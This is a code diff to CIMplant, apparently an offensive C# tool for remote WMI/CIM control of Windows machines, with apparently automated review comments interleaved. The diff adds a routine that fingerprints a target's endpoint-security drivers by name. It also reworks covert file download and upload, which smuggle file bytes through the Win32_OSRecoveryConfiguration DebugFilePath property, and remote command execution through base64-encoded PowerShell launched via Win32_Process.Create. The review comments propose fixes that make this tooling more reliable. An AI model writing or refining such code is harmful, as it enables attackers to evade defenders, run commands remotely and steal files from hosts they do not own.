diff --git a/CIMplant/Commander.cs b/CIMplant/Commander.cs old mode 100755 new mode 100644 index 0a41293..18648a4 --- a/CIMplant/Commander.cs +++ b/CIMplant/Commander.cs @@ -10,7 +10,7 @@ public class Commander { public string Command, Execute, File, Cmdlet, FileTo, Directory, RegKey, RegSubKey, RegVal, RegValType, Service, ServiceBin, Method, Process; - public bool Reset; + public bool Reset, NoPS; private readonly string[] _shutdown = { "logoff", "reboot", "restart", "power_off", "shutdown" }; private readonly string[] _fileCommand = { "cat", "copy", "download", "ls", "search", "upload" }; @@ -38,6 +38,7 @@ public Commander() this.Reset = Options.Instance.Reset; this.Process = Options.Instance.Process; this.Method = null; + this.NoPS = Options.Instance.NoPS; } public Commander(string command) @@ -196,7 +197,7 @@ private void ParseCommands() "restart", "power_off", "shutdown", "vacant_system", "logon_events", "command_exec", "disable_wdigest", "enable_wdigest", "disable_winrm", "enable_winrm", - "reg_mod", "reg_create", "reg_delete", "remote_posh", "sched_job", "service_mod" + "reg_mod", "reg_create", "reg_delete", "remote_posh", "sched_job", "service_mod", "edr_query" }; public static void DisplayHelp(ParserResult result, IEnumerable errs) @@ -204,7 +205,7 @@ public static void DisplayHelp(ParserResult result, IEnumerable err HelpText helpText = HelpText.AutoBuild(result, h => { h.AdditionalNewLineAfterOption = false; - h.Heading = "WMI C# Version 0.1"; //change header + h.Heading = "WMI C# Version 0.2"; //change header h.Copyright = ""; //change copyright text h.AutoVersion = false; return HelpText.DefaultParsingErrorsHandler(result, h); 
@@ -311,6 +312,10 @@ public class Options [Option("provider", Required = false, HelpText = "Use InstallUtil to register a WMI provider (Not Currently Working)", Default = false)] public bool Provider { get; set; } + + [Option("nops", Required = false, HelpText = "Do not allow any PowerShell execution (will die before)", + Default = false)] + public bool NoPS { get; set; } [Option("show-commands", Group = "Command", Required = true, HelpText = "Displays a list of available commands")] diff --git a/CIMplant/Connector.cs b/CIMplant/Connector.cs old mode 100755 new mode 100644 index 53e32cb..e30f4d2 --- a/CIMplant/Connector.cs +++ b/CIMplant/Connector.cs @@ -65,6 +65,7 @@ private CimSession DoCimConnection(Planter planter) sessionOptions.AddDestinationCredentials(credentials); sessionOptions.MaxEnvelopeSize = 256000; // Not sure how else to get around this connectedCimSession = CimSession.Create(SystemToConn, sessionOptions); + } else @@ -73,9 +74,15 @@ private CimSession DoCimConnection(Planter planter) connectedCimSession = CimSession.Create(SystemToConn, options); } + //connectedCimSession.TestConnection(); + // Test connection to make sure we're connected - if (!connectedCimSession.TestConnection()) + if (!connectedCimSession.TestConnection(out CimInstance instance, out CimException exception)) + { return null; + } + + Messenger.GoodMessage("[+] Connected\n"); return connectedCimSession; diff --git a/CIMplant/ExecuteCIM.cs b/CIMplant/ExecuteCIM.cs old mode 100755 new mode 100644 index d2a367f..4f9854c --- a/CIMplant/ExecuteCIM.cs +++ b/CIMplant/ExecuteCIM.cs 
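Review bot: The help text for the new `nops` option, `Do not allow any PowerShell execution (will die before)`, does not say what "dies" or what the flag actually changes, and elsewhere in this commit the behaviour differs per function (download and upload are refused outright, command_exec switches to a raw `Win32_Process.Create`). An operator reading `--help` should get that distinction: `HelpText = "Never spawn PowerShell on the target: download/upload are refused, command_exec runs the raw command line via Win32_Process.Create"`. The Options class continues outside this hunk.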
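Review bot: The `CimException exception` that `TestConnection(out CimInstance instance, out CimException exception)` now hands back is captured and then discarded, so a failed connection test still returns `null` with no indication of why (bad credentials, DCOM or WinRM blocked, wrong host). Surface it before the early return, e.g. `if (exception != null) Messenger.ErrorMessage("[-] Connection test failed: " + exception.Message);`, and drop the dead `//connectedCimSession.TestConnection();` line and the unused `instance` while here. DoCimConnection's body begins before this hunk.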
@@ -268,6 +268,291 @@ public object vacant_system(Planter planter) return queryInstance; } + // Idea and some code thanks to Harley - https://github.com/harleyQu1nn/AggressorScripts/blob/master/EDR.cna + public object edr_query(Planter planter) + { + CimSession cimSession = planter.Connector.ConnectedCimSession; + bool activeEdr = false; + + string fileQuery = @"SELECT * FROM CIM_DataFile WHERE Path = '\\windows\\System32\\drivers\\'"; + IEnumerable queryInstance = cimSession.QueryInstances(Namespace, "WQL", fileQuery); + + foreach (CimInstance cimObject in queryInstance) + { + string fileName = Path.GetFileName(cimObject.CimInstanceProperties["Name"].Value.ToString()); + + switch (fileName) + { + case "FeKern.sys": + case "WFP_MRT.sys": + Messenger.ErrorMessage("FireEye Found!"); + activeEdr = true; + break; + + case "eaw.sys": + Messenger.ErrorMessage("Raytheon Cyber Solutions Found!"); + activeEdr = true; + break; + + case "rvsavd.sys": + Messenger.ErrorMessage("CJSC Returnil Software Found!"); + activeEdr = true; + break; + + case "dgdmk.sys": + Messenger.ErrorMessage("Verdasys Inc. 
Found!"); + activeEdr = true; + break; + + case "atrsdfw.sys": + Messenger.ErrorMessage("Altiris (Symantec) Found!"); + activeEdr = true; + break; + + case "mbamwatchdog.sys": + Messenger.ErrorMessage("Malwarebytes Found!"); + activeEdr = true; + break; + + case "edevmon.sys": + case "ehdrv.sys": + Messenger.ErrorMessage("ESET Found!"); + activeEdr = true; + break; + + case "SentinelMonitor.sys": + Messenger.ErrorMessage("SentinelOne Found!"); + activeEdr = true; + break; + + case "edrsensor.sys": + case "hbflt.sys": + case "bdsvm.sys": + case "gzflt.sys": + case "bddevflt.sys": + case "AVCKF.SYS": + case "Atc.sys": + case "AVC3.SYS": + case "TRUFOS.SYS": + case "BDSandBox.sys": + Messenger.ErrorMessage("BitDefender Found!"); + activeEdr = true; + break; + + case "HexisFSMonitor.sys": + Messenger.ErrorMessage("Hexis Cyber Solutions Found!"); + activeEdr = true; + break; + + case "CyOptics.sys": + case "CyProtectDrv32.sys": + case "CyProtectDrv64.sys": + Messenger.ErrorMessage("Cylance Inc. 
Found!"); + activeEdr = true; + break; + + case "aswSP.sys": + Messenger.ErrorMessage("Avast Found!"); + activeEdr = true; + break; + + case "mfeaskm.sys": + case "mfencfilter.sys": + case "epdrv.sys": + case "mfencoas.sys": + case "mfehidk.sys": + case "swin.sys": + case "hdlpflt.sys": + case "mfprom.sys": + case "MfeEEFF.sys": + Messenger.ErrorMessage("McAfee Found!"); + activeEdr = true; + break; + + case "groundling32.sys": + case "groundling64.sys": + Messenger.ErrorMessage("Dell Secureworks Found!"); + activeEdr = true; + break; + + case "avgtpx86.sys": + case "avgtpx64.sys": + Messenger.ErrorMessage("AVG Technologies Found!"); + activeEdr = true; + break; + + case "pgpwdefs.sys": + case "GEProtection.sys": + case "diflt.sys": + case "sysMon.sys": + case "ssrfsf.sys": + case "emxdrv2.sys": + case "reghook.sys": + case "spbbcdrv.sys": + case "bhdrvx86.sys": + case "bhdrvx64.sys": + case "SISIPSFileFilter.sys": + case "symevent.sys": + case "vxfsrep.sys": + case "VirtFile.sys": + case "SymAFR.sys": + case "symefasi.sys": + case "symefa.sys": + case "symefa64.sys": + case "SymHsm.sys": + case "evmf.sys": + case "GEFCMP.sys": + case "VFSEnc.sys": + case "pgpfs.sys": + case "fencry.sys": + case "symrg.sys": + Messenger.ErrorMessage("Symantec Found!"); + activeEdr = true; + break; + + case "SAFE-Agent.sys": + Messenger.ErrorMessage("SAFE-Cyberdefense Found!"); + activeEdr = true; + break; + + case "CybKernelTracker.sys": + Messenger.ErrorMessage("CyberArk Software Found!"); + activeEdr = true; + break; + + case "klifks.sys": + case "klifaa.sys": + case "Klifsm.sys": + Messenger.ErrorMessage("Kaspersky Found!"); + activeEdr = true; + break; + + case "SAVOnAccess.sys": + case "savonaccess.sys": + case "sld.sys": + Messenger.ErrorMessage("Sophos Found!"); + activeEdr = true; + break; + + case "ssfmonm.sys": + Messenger.ErrorMessage("Webroot Software, Inc. 
Found!"); + activeEdr = true; + break; + + case "CarbonBlackK.sys": + case "carbonblackk.sys": + case "Parity.sys": + case "cbk7.sys": + case "cbstream.sys": + Messenger.ErrorMessage("Carbon Black Found!"); + activeEdr = true; + break; + + case "CRExecPrev.sys": + Messenger.ErrorMessage("Cybereason Found!"); + activeEdr = true; + break; + + case "im.sys": + case "CSAgent.sys": + case "CSBoot.sys": + case "CSDeviceControl.sys": + case "cspcm2.sys": + Messenger.ErrorMessage("CrowdStrike Found!"); + activeEdr = true; + break; + + case "cfrmd.sys": + case "cmdccav.sys": + case "cmdguard.sys": + case "CmdMnEfs.sys": + case "MyDLPMF.sys": + Messenger.ErrorMessage("Comodo Security Solutions Found!"); + activeEdr = true; + break; + + case "PSINPROC.SYS": + case "PSINFILE.SYS": + case "amfsm.sys": + case "amm8660.sys": + case "amm6460.sys": + Messenger.ErrorMessage("Panda Security Found!"); + activeEdr = true; + break; + + case "fsgk.sys": + case "fsatp.sys": + case "fshs.sys": + Messenger.ErrorMessage("F-Secure Found!"); + activeEdr = true; + break; + + case "esensor.sys": + Messenger.ErrorMessage("Endgame Found!"); + activeEdr = true; + break; + + case "csacentr.sys": + case "csaenh.sys": + case "csareg.sys": + case "csascr.sys": + case "csaav.sys": + case "csaam.sys": + Messenger.ErrorMessage("Cisco Found!"); + activeEdr = true; + break; + + case "TMUMS.sys": + case "hfileflt.sys": + case "TMUMH.sys": + case "AcDriver.sys": + case "SakFile.sys": + case "SakMFile.sys": + case "fileflt.sys": + case "TmEsFlt.sys": + case "tmevtmgr.sys": + case "TmFileEncDmk.sys": + Messenger.ErrorMessage("Trend Micro Inc Found!"); + activeEdr = true; + break; + + case "epregflt.sys": + case "medlpflt.sys": + case "dsfa.sys": + case "cposfw.sys": + Messenger.ErrorMessage("Check Point Software Technologies Found!"); + activeEdr = true; + break; + + case "psepfilter.sys": + case "cve.sys": + Messenger.ErrorMessage("Absolute Found!"); + activeEdr = true; + break; + + case "brfilter.sys": + 
Messenger.ErrorMessage("Bromium Found!"); + activeEdr = true; + break; + + case "LRAgentMF.sys": + Messenger.ErrorMessage("LogRhythm Found!"); + activeEdr = true; + break; + + case "libwamf.sys": + Messenger.ErrorMessage("OPSWAT Inc Found!"); + activeEdr = true; + break; + } + } + + if (!activeEdr) + Console.WriteLine("No EDR vendors found, tread carefully"); + + return true; + } + /////////////////////////////////////// FILE OPERATIONS ///////////////////////////////////////////////////////////////////// 
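Review bot: The driver-name match in `switch (fileName)` is an ordinal, case-sensitive comparison, but NTFS file names are not case-sensitive, so a driver stored as `sentinelmonitor.sys` or `CSAGENT.SYS` is silently missed; the duplicated labels already in the list (`SAVOnAccess.sys`/`savonaccess.sys`, `CarbonBlackK.sys`/`carbonblackk.sys`) show it is fighting exactly this. Switch on `fileName.ToLowerInvariant()` (or look the name up in a `Dictionary<string, string>` built with `StringComparer.OrdinalIgnoreCase`) and keep one lower-case label per driver. `activeEdr` also overstates what the query proves: a file sitting in `\windows\System32\drivers` is not evidence the product is loaded, so either rename it to something like `edrDriverPresent` or confirm with a second query against `Win32_SystemDriver` filtered on `State = 'Running'` before reporting a vendor as active. The WQL filter constrains `Path` but not `Drive`, so I would expect the already slow `CIM_DataFile` enumeration to walk every volume on the target; adding a `Drive` clause keeps it to the system drive.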
@@ -350,145 +635,152 @@ public object download(Planter planter) return null; } - string originalWmiProperty = GetOsRecovery(cimSession); - bool wsman = true; - bool resetEnvSize = false; - string originalRemoteEnvSize = EnvelopeSize.GetMaxEnvelopeSize(cimSession); - string originalLocalEnvSize = EnvelopeSize.GetLocalMaxEnvelopeSize(); + if (!planter.Commander.NoPS) + { + string originalWmiProperty = GetOsRecovery(cimSession); + bool wsman = true; + bool resetEnvSize = false; + string originalRemoteEnvSize = EnvelopeSize.GetMaxEnvelopeSize(cimSession); + string originalLocalEnvSize = EnvelopeSize.GetLocalMaxEnvelopeSize(); - // Get the local maxEnvelopeSize. If it's not set (default) let's note that - originalRemoteEnvSize = originalRemoteEnvSize == "0" ? "500" : originalRemoteEnvSize; - originalLocalEnvSize = originalLocalEnvSize == "0" ? "500" : originalLocalEnvSize; - - Messenger.GoodMessage("[+] Downloading file: " + downloadPath + "\n"); + // Get the local maxEnvelopeSize. If it's not set (default) let's note that + originalRemoteEnvSize = originalRemoteEnvSize == "0" ? "500" : originalRemoteEnvSize; + originalLocalEnvSize = originalLocalEnvSize == "0" ? "500" : originalLocalEnvSize; - if (wsman == true) - { - int fileSize = GetFileSize(downloadPath, cimSession); + Messenger.GoodMessage("[+] Downloading file: " + downloadPath + "\n"); - // We can modify this later easily to pass wsman if needed - using (PowerShell powershell = PowerShell.Create()) + if (wsman == true) { - try - { - powershell.Runspace = !string.IsNullOrEmpty(planter.Password?.ToString()) ? 
RunspaceCreate(planter) : RunspaceCreateLocal(); + int fileSize = GetFileSize(downloadPath, cimSession); - if (fileSize / 1024 > 450) + // We can modify this later easily to pass wsman if needed + using (PowerShell powershell = PowerShell.Create()) + { + try { - resetEnvSize = true; - Messenger.WarningMessage( - "[*] Warning: The file size is greater than 450 KB, setting the maxEnvelopeSizeKB higher..."); - int envSize = fileSize / 1024 > 250000 ? 999999999 : 256000; - EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); - EnvelopeSize.SetMaxEnvelopeSize(envSize.ToString(), cimSession); - } + powershell.Runspace = !string.IsNullOrEmpty(planter.Password?.ToString()) ? RunspaceCreate(planter) : RunspaceCreateLocal(); - string command1 = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + - "'"; - const string command2 = @"$encdata = [Int[]][byte[]]$data -Join ','"; - const string command3 = - @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; + if (fileSize / 1024 > 450) + { + resetEnvSize = true; + Messenger.WarningMessage( + "[*] Warning: The file size is greater than 450 KB, setting the maxEnvelopeSizeKB higher..."); + int envSize = fileSize / 1024 > 250000 ? 
999999999 : 256000; + EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); + EnvelopeSize.SetMaxEnvelopeSize(envSize.ToString(), cimSession); + } - if (powershell.Runspace.ConnectionInfo != null) - { - powershell.Commands.AddScript(command1, false); - powershell.Commands.AddScript(command2, false); - powershell.Commands.AddScript(command3, false); - powershell.Invoke(); + string command1 = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + + "'"; + const string command2 = @"$encdata = [Int[]][byte[]]$data -Join ','"; + const string command3 = + @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; + if (powershell.Runspace.ConnectionInfo != null) + { + powershell.Commands.AddScript(command1, false); + powershell.Commands.AddScript(command2, false); + powershell.Commands.AddScript(command3, false); + powershell.Invoke(); + + } + else + wsman = false; } - else + catch (PSRemotingTransportException) + { wsman = false; - } - catch (PSRemotingTransportException) - { - wsman = false; + } } } - } - if (wsman == false) - { - // WSMAN not enabled on the remote system, use another method + if (wsman == false) + { + // WSMAN not enabled on the remote system, use another method - // We need to check for the remote file size. If over 500KB (or 450 to be sure) let's raise the maxEnvelopeSizeKB - int fileSize = GetFileSize(downloadPath, cimSession); + // We need to check for the remote file size. If over 500KB (or 450 to be sure) let's raise the maxEnvelopeSizeKB + int fileSize = GetFileSize(downloadPath, cimSession); - if (fileSize / 1024 > 450) - { - resetEnvSize = true; - int envSize = fileSize / 1024 > 250000 ? 
999999999 : 256000; - Messenger.WarningMessage( - "[*] Warning: The file size is greater than 450 KB, setting the maxEnvelopeSizeKB higher..."); - if (fileSize / 1024 > 250000) - { - EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); - EnvelopeSize.SetMaxEnvelopeSize("999999999", - cimSession); // This is the largest value we can set, so not sure if this will work - } - else + if (fileSize / 1024 > 450) { - EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); - EnvelopeSize.SetMaxEnvelopeSize("256000", cimSession); + resetEnvSize = true; + int envSize = fileSize / 1024 > 250000 ? 999999999 : 256000; + Messenger.WarningMessage( + "[*] Warning: The file size is greater than 450 KB, setting the maxEnvelopeSizeKB higher..."); + if (fileSize / 1024 > 250000) + { + EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); + EnvelopeSize.SetMaxEnvelopeSize("999999999", + cimSession); // This is the largest value we can set, so not sure if this will work + } + else + { + EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); + EnvelopeSize.SetMaxEnvelopeSize("256000", cimSession); + } } - } - // Create the parameters and create the new process. Broken out to make it easier to follow what's up - CimMethodParametersCollection cimParams = new CimMethodParametersCollection(); + // Create the parameters and create the new process. 
Broken out to make it easier to follow what's up + CimMethodParametersCollection cimParams = new CimMethodParametersCollection(); - string encodedCommand = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + - "'; $encdata = [Int[]][byte[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; - var encodedCommandB64 = - Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - string fullCommand = "powershell -enc " + encodedCommandB64; + string encodedCommand = "$data = Get-Content -Encoding byte -ReadCount 0 -Path '" + downloadPath + + "'; $encdata = [Int[]][byte[]]$data -Join ','; $a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $encdata; $a.Put()"; + var encodedCommandB64 = + Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); + string fullCommand = "powershell -enc " + encodedCommandB64; - cimParams.Add(CimMethodParameter.Create("CommandLine", fullCommand, CimFlags.In)); + cimParams.Add(CimMethodParameter.Create("CommandLine", fullCommand, CimFlags.In)); - // We only need the first instance - cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); - } + // We only need the first instance + cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); + } - // Give it a second to write and check for changes to DebugFilePath - Thread.Sleep(1000); - Messenger.WarningMessage("\n[*] Checking for a modified DebugFilePath and grabbing the data. This may take a while if the file is large (USE WMI IF IT IS)\n"); + // Give it a second to write and check for changes to DebugFilePath + Thread.Sleep(1000); + Messenger.WarningMessage("\n[*] Checking for a modified DebugFilePath and grabbing the data. 
This may take a while if the file is large (USE WMI IF IT IS)\n"); - //string[] fileOutput = CheckForFinishedDebugFilePath(originalWMIProperty, cimSession).Split(','); - string fileOutput = CheckForFinishedDebugFilePath(originalWmiProperty, cimSession); + //string[] fileOutput = CheckForFinishedDebugFilePath(originalWMIProperty, cimSession).Split(','); + string fileOutput = CheckForFinishedDebugFilePath(originalWmiProperty, cimSession); - // We need to pause for a bit here for some reason - Thread.Sleep(5000); + // We need to pause for a bit here for some reason + Thread.Sleep(5000); - //Create list for bytes - List outputList = new List(); + //Create list for bytes + List outputList = new List(); - //Convert from int (bytes) to byte - foreach (string integer in fileOutput.Split(',')) - { - try + //Convert from int (bytes) to byte + foreach (string integer in fileOutput.Split(',')) { - byte a = (byte)Convert.ToInt32(integer); - outputList.Add(a); - } - catch - { - //pass + try + { + byte a = (byte)Convert.ToInt32(integer); + outputList.Add(a); + } + catch + { + //pass + } } - } - //Save to local dir if no directory specified - if (string.IsNullOrEmpty(writePath)) - writePath = Path.GetFileName(downloadPath); + //Save to local dir if no directory specified + if (string.IsNullOrEmpty(writePath)) + writePath = Path.GetFileName(downloadPath); - File.WriteAllBytes(writePath, outputList.ToArray()); + File.WriteAllBytes(writePath, outputList.ToArray()); - SetOsRecovery(cimSession, originalWmiProperty); + SetOsRecovery(cimSession, originalWmiProperty); - if (resetEnvSize) + if (resetEnvSize) + { + // Set the maxEnvelopeSizeKB back to the default val if we set it previously + EnvelopeSize.SetLocalMaxEnvelopeSize(Convert.ToInt32(originalLocalEnvSize)); + EnvelopeSize.SetMaxEnvelopeSize(originalRemoteEnvSize, cimSession); + } + } + else { - // Set the maxEnvelopeSizeKB back to the default val if we set it previously - 
EnvelopeSize.SetLocalMaxEnvelopeSize(Convert.ToInt32(originalLocalEnvSize)); - EnvelopeSize.SetMaxEnvelopeSize(originalRemoteEnvSize, cimSession); + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); } return true; 
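Review bot: Nothing in download restores the target if the transfer throws part-way: only `PSRemotingTransportException` is caught, so any other failure in `powershell.Invoke()`, `InvokeMethod` or `File.WriteAllBytes` skips `SetOsRecovery(cimSession, originalWmiProperty)` and the `resetEnvSize` reset, leaving the target's `Win32_OSRecoveryConfiguration.DebugFilePath` holding the file bytes and `MaxEnvelopeSizeKb` raised. Move those two restore steps into a `finally` that wraps everything after `originalWmiProperty`, `originalRemoteEnvSize` and `originalLocalEnvSize` are read. The new `--nops` refusal branch also ends in `return true;`, the same value a completed download returns, so a scripted caller cannot tell the two apart; return `null` there as the guard at the top of the hunk does. download's body begins before this hunk.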
@@ -604,121 +896,128 @@ public object upload(Planter planter) return null; } - string originalWmiProperty = GetOsRecovery(cimSession); - bool wsman = true; - bool resetEnvSize = false; - int envSize = 500; + if (!planter.Commander.NoPS) + { + string originalWmiProperty = GetOsRecovery(cimSession); + bool wsman = true; + bool resetEnvSize = false; + int envSize = 500; - Messenger.GoodMessage("[+] Uploading file: " + uploadFile + " to " + writePath); - Messenger.GoodMessage("--------------------------------------------------------------------\n"); + Messenger.GoodMessage("[+] Uploading file: " + uploadFile + " to " + writePath); + Messenger.GoodMessage("--------------------------------------------------------------------\n"); - // We need to check for the remote file size. If over 500KB (or 450 to be sure) let's raise the maxEnvelopeSizeKB - int fileSize = (int) new FileInfo(uploadFile).Length; //Value in KB + // We need to check for the remote file size. If over 500KB (or 450 to be sure) let's raise the maxEnvelopeSizeKB + int fileSize = (int)new FileInfo(uploadFile).Length; //Value in KB - if (fileSize / 1024 > 450) - { - resetEnvSize = true; - envSize = fileSize / 1024 > 250000 ? 999999999 : 256000; - Messenger.WarningMessage( - "[*] Warning: The file size is greater than 450 KB, setting the maxEnvelopeSizeKB higher..."); - if (fileSize / 1024 > 250000) - { - EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); - EnvelopeSize.SetMaxEnvelopeSize("999999999", - cimSession); // This is the largest value we can set, so not sure if this will work - } - else + if (fileSize / 1024 > 450) { - EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); - EnvelopeSize.SetMaxEnvelopeSize("256000", cimSession); + resetEnvSize = true; + envSize = fileSize / 1024 > 250000 ? 
999999999 : 256000; + Messenger.WarningMessage( + "[*] Warning: The file size is greater than 450 KB, setting the maxEnvelopeSizeKB higher..."); + if (fileSize / 1024 > 250000) + { + EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); + EnvelopeSize.SetMaxEnvelopeSize("999999999", + cimSession); // This is the largest value we can set, so not sure if this will work + } + else + { + EnvelopeSize.SetLocalMaxEnvelopeSize(envSize); + EnvelopeSize.SetMaxEnvelopeSize("256000", cimSession); + } } - } - List intList = new List(); - byte[] uploadFileBytes = File.ReadAllBytes(uploadFile); + List intList = new List(); + byte[] uploadFileBytes = File.ReadAllBytes(uploadFile); - //Convert from byte to int (bytes) - foreach (byte uploadByte in uploadFileBytes) - { - int a = uploadByte; - intList.Add(a); - } + //Convert from byte to int (bytes) + foreach (byte uploadByte in uploadFileBytes) + { + int a = uploadByte; + intList.Add(a); + } - SetOsRecovery(cimSession, string.Join(",", intList)); + SetOsRecovery(cimSession, string.Join(",", intList)); - // Give it a second to write and check for changes to DebugFilePath - Messenger.WarningMessage( - "\n[*] Checking for a modified DebugFilePath and grabbing the data. This may take a while if the file is large (USE WMI IF IT IS)\n"); - System.Threading.Thread.Sleep(1000); - CheckForFinishedDebugFilePath(originalWmiProperty, cimSession); + // Give it a second to write and check for changes to DebugFilePath + Messenger.WarningMessage( + "\n[*] Checking for a modified DebugFilePath and grabbing the data. 
This may take a while if the file is large (USE WMI IF IT IS)\n"); + System.Threading.Thread.Sleep(1000); + CheckForFinishedDebugFilePath(originalWmiProperty, cimSession); - if (wsman == true) - { - // We can modify this later easily to pass wsman if needed - using (PowerShell powershell = PowerShell.Create()) + if (wsman == true) { - try + // We can modify this later easily to pass wsman if needed + using (PowerShell powershell = PowerShell.Create()) { - if (!string.IsNullOrEmpty(planter.Password?.ToString())) - powershell.Runspace = RunspaceCreate(planter); - else - powershell.Runspace = RunspaceCreateLocal(); + try + { + if (!string.IsNullOrEmpty(planter.Password?.ToString())) + powershell.Runspace = RunspaceCreate(planter); + else + powershell.Runspace = RunspaceCreateLocal(); - const string command1 = - @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath"; - const string command2 = @"$decode = [byte[]][int[]]$encdata.Split(',') -Join ' '"; - string command3 = - @"[byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + - writePath + "' -Value $decoded"; + const string command1 = + @"$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath"; + const string command2 = @"$decode = [byte[]][int[]]$encdata.Split(',') -Join ' '"; + string command3 = + @"[byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + + writePath + "' -Value $decoded"; - if (powershell.Runspace.ConnectionInfo != null) - { - powershell.Commands.AddScript(command1, false); - powershell.Commands.AddScript(command2, false); - powershell.Commands.AddScript(command3, false); - powershell.Invoke(); + if (powershell.Runspace.ConnectionInfo != null) + { + powershell.Commands.AddScript(command1, false); + powershell.Commands.AddScript(command2, false); + powershell.Commands.AddScript(command3, false); + powershell.Invoke(); + } + else + wsman = false; } - else + catch 
(PSRemotingTransportException) + { wsman = false; - } - catch (PSRemotingTransportException) - { - wsman = false; + } } } - } - if (wsman == false) - { - // WSMAN not enabled on the remote system, use another method + if (wsman == false) + { + // WSMAN not enabled on the remote system, use another method - // Create the parameters and create the new process. Broken out to make it easier to follow what's up - CimMethodParametersCollection cimParams = new CimMethodParametersCollection(); + // Create the parameters and create the new process. Broken out to make it easier to follow what's up + CimMethodParametersCollection cimParams = new CimMethodParametersCollection(); - string encodedCommand = - "$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath; $decode = [byte[]][int[]]$encdata.Split(',') -Join ' '; [byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + - writePath + "' -Value $decoded"; - var encodedCommandB64 = - Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); - string fullCommand = "powershell -enc " + encodedCommandB64; + string encodedCommand = + "$a = Get-WmiObject -Class Win32_OSRecoveryConfiguration; $encdata = $a.DebugFilePath; $decode = [byte[]][int[]]$encdata.Split(',') -Join ' '; [byte[]] $decoded = $decode -split ' '; Set-Content -Encoding byte -Force -Path '" + + writePath + "' -Value $decoded"; + var encodedCommandB64 = + Convert.ToBase64String(Encoding.Unicode.GetBytes(encodedCommand)); + string fullCommand = "powershell -enc " + encodedCommandB64; - cimParams.Add(CimMethodParameter.Create("CommandLine", fullCommand, CimFlags.In)); + cimParams.Add(CimMethodParameter.Create("CommandLine", fullCommand, CimFlags.In)); - // We only need the first instance - cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams); + // We only need the first instance + cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", 
cimParams); - // Give it a second to write - System.Threading.Thread.Sleep(1000); - } + // Give it a second to write + System.Threading.Thread.Sleep(1000); + } - // Set OSRecovery back to normal pls - SetOsRecovery(cimSession, originalWmiProperty); + // Set OSRecovery back to normal pls + SetOsRecovery(cimSession, originalWmiProperty); - if (resetEnvSize) + if (resetEnvSize) + { + // Set the maxEnvelopeSizeKB back to the default val if we set it previously + EnvelopeSize.SetLocalMaxEnvelopeSize(500); + EnvelopeSize.SetMaxEnvelopeSize("500", cimSession); + } + } + else { - // Set the maxEnvelopeSizeKB back to the default val if we set it previously - EnvelopeSize.SetLocalMaxEnvelopeSize(500); - EnvelopeSize.SetMaxEnvelopeSize("500", cimSession); + Messenger.WarningMessage("Not running function to avoid any PowerShell usage, remove --nops or pick a new function"); } return true; 
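Review bot: Unlike download, the cleanup at the end of upload puts the envelope size back to a hard-coded default, `EnvelopeSize.SetLocalMaxEnvelopeSize(500); EnvelopeSize.SetMaxEnvelopeSize("500", cimSession);`, rather than to the values the target and the operator host had before, so a target configured with a non-default `MaxEnvelopeSizeKb` is left changed after the upload. Read the originals up front the way download does (`EnvelopeSize.GetMaxEnvelopeSize(cimSession)` and `EnvelopeSize.GetLocalMaxEnvelopeSize()`) and restore those. The comment `//Value in KB` on `int fileSize = (int)new FileInfo(uploadFile).Length;` is wrong — `Length` is bytes, which the `/ 1024` two lines later already assumes — and the `--nops` refusal returns `true` exactly like a successful upload. upload's body begins before this hunk.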
@@ -746,173 +1045,197 @@ public object command_exec(Planter planter) Messenger.GoodMessage("[+] Executing command: " + planter.Commander.Execute); Messenger.GoodMessage("--------------------------------------------------------\n"); - if (wsman) + + if (!planter.Commander.NoPS) { - // We can modify this later easily to pass wsman if needed - using (PowerShell powershell = PowerShell.Create()) + if (wsman) { - try + // We can modify this later easily to pass wsman if needed + using (PowerShell powershell = PowerShell.Create()) { - if (!string.IsNullOrEmpty(planter.System?.ToString())) - powershell.Runspace = RunspaceCreate(planter); - else + try { - powershell.Runspace = RunspaceCreateLocal(); - powershell.AddCommand(command); - Collection result = powershell.Invoke(); - foreach (PSObject a in result) + if (!string.IsNullOrEmpty(planter.System?.ToString())) + powershell.Runspace = RunspaceCreate(planter); + else { - Console.WriteLine(a); - } + powershell.Runspace = RunspaceCreateLocal(); + powershell.AddCommand(command); + Collection result = powershell.Invoke(); + foreach (PSObject a in result) + { + Console.WriteLine(a); + } - return true; + return true; + } + } + catch (PSRemotingTransportException) + { + wsman = false; + goto GetOut; // Do this so we're not doing below work when we don't need to + } + catch (Exception e) + { + Console.WriteLine(e); } - } - catch (PSRemotingTransportException) - { - wsman = false; - goto GetOut; // Do this so we're not doing below work when we don't need to - } - catch (Exception e) - { - Console.WriteLine(e); - } - - if (powershell.Runspace.ConnectionInfo != null) - { - string command1 = "$data 